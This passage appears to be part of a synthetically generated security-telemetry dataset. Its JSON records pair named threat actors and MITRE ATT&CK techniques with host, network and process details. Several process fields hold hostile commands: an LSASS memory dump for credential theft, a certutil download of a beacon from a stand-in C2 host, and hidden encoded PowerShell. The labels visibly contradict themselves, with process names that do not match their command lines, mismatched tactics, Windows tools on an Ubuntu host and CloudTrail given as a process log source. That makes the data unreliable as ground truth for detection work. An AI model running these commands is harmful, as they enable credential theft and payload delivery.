Stable)","variation_seed":"19791APT29T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.187.174.204","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-25T00:06:43.000Z","user":{"name":"CORP\\ovmw9udwrec4","sid":"S-1-5-21-522758114-506184276-2186"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion","Privilege Escalation","Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20260610T000614000Z_0019793","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.187.181.220","name":"WIN-FIN-SRV-XR48WF980M","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19793UNC4841T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.130.50.67","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-18T22:52:43.000Z","user":{"name":"i-344nhr6yxwib","sid":"S-1-5-21-645218954-739960026-4355"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance","Persistence","Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20250413T120544000Z_0019795","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.16.116.31","name":"AZURE-VM-53KASPZP2L","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19795FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.131.130.51","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3421 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-10-25T04:38:47.000Z","user":{"name":"CORP\\4eohfr3feinr","sid":"S-1-5-21-667323018-424358349-6661"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Discovery"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20260421T032240000Z_0019797","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.102.144.112","name":"IAM-ROLE-0JJKO805QJ","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19797APT29T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.14.83.140","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 701 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-02-09T02:52:05.000Z","user":{"name":"CORP\\qhjk0ffywf34","sid":"S-1-5-21-723896203-706510693-4893"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20260114T072704000Z_0019799","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.0.109.210","name":"EC2-INST-E5O8FRUS1C","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19799APT41T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.2.201.9","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-06-05T10:30:12.000Z","user":{"name":"azuread\\6dn0uyinnceq","sid":"S-1-5-21-635902895-220476627-9522"}}